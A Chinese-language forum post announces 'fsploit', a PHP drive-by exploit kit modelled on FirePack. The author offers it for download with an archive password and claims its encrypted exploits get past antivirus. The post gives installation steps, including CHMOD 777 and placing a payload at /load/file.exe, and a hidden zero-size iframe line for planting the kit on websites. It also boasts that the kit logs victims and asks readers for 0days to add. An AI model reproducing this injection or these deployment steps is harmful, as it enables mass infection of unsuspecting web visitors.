仿FirePack网马管理系统fsploit

尽管你可能看过或用过IcePack或是MPack之类的系统

不过文章提到这版本的价钱一定让你大开眼界it is really expensive compared to other kits: 3000$,将近三千元美金的高价(MPack一千元)

实际上这种智慧型网马会因应不同浏览器产生不同的漏洞做攻击，而且在加载之后会进行记录和统计分析大体上IE Firefox Opera都能感染

我模仿FirePack系统程式码(很抱歉我不是在使用简体中文的环境里所以不是做简中的介面)并将网马0day原始码部分加密,可运行通过我自己的卡巴斯基网路安全套装软体(因为在某些exploit原始码的部分有加注打论顺序)本系统无须配置SQL资料库，纯粹使用PHP环境即可运行

大略解释下安装流程

1.先编辑config.php内容达到你要的配置，并将档案上传到网页伺服器里，要远端执行的档案放在/load/file.exe另外ref.db要CHMOD 777
2.浏览http://xxx/fsploit/admin/ 输入帐号密码进入管理介面(附图如下)
3.使用一般挂马语法挂马

以下是代码片段： <iframe src=http://xxx/fsploit/index.php width=0 height=0></iframe>

//挂马的src就是根目录的index.php
4.所有的exploit都已经集结完成，会按浏览者的浏览器做出不同攻击
5.坐下来，慢慢等，不用着急，谁几点几分从哪里踩中网马都记得分明
以上写到这里.
这款php程序中马率或许看起来不高，不过这种机关枪的打法比狙击枪的打法杀的更多,如果你有其他0day愿意分享我可以加到payload里，你有兴趣的话也可以自己试试看.
档案解压缩密码: f3v3r
MD5 : f82e789df8c4bccfb42b8f3276cf80c1

下载地址：
fsploit.rar